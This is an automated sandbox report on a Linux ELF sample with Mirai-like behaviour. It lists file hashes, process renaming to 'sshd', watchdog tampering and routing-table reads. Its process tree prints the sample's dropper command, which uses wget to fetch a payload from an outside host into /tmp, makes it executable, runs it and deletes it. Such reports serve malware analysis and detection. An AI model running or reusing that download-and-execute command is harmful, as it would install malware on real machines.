Analysis
-
max time kernel
147s -
max time network
142s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
23-02-2024 05:02
Behavioral task
behavioral1
Sample
37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf
-
Size
97KB
-
MD5
6d658881294fbbcb36dee0f4bc05c98a
-
SHA1
b772975381cb0c2b5897eac6eb1d94049719b708
-
SHA256
37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739
-
SHA512
4f316659a7cf125852a94a61a824f819d29a8d913d656c325152588b7d0c6a3c9ba89ca069e3dd22c3d0656e345530ea1789e9cb96f5ed65ece41719fa4bcd48
-
SSDEEP
3072:gjtwgA6UlYzZveohR9kIEpfdGZmmFVcqq0G27ZT:gjhzt3mIEpfAmmFVcqq0G27ZT
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 1469 37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 1486 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route 37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route 37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf/tmp/37b552e1027ecf2bdec32cf8c538baa058928b560dd225611a4ea5deb16cb739.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:1469 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:1470
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:1475
-
-
/usr/bin/chmodchmod 777 .....3⤵PID:1485
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:1486
-
-
/bin/sh/bin/sh ./.....3⤵PID:1486
-
-
/usr/bin/rmrm -rf .....3⤵PID:1488
-
-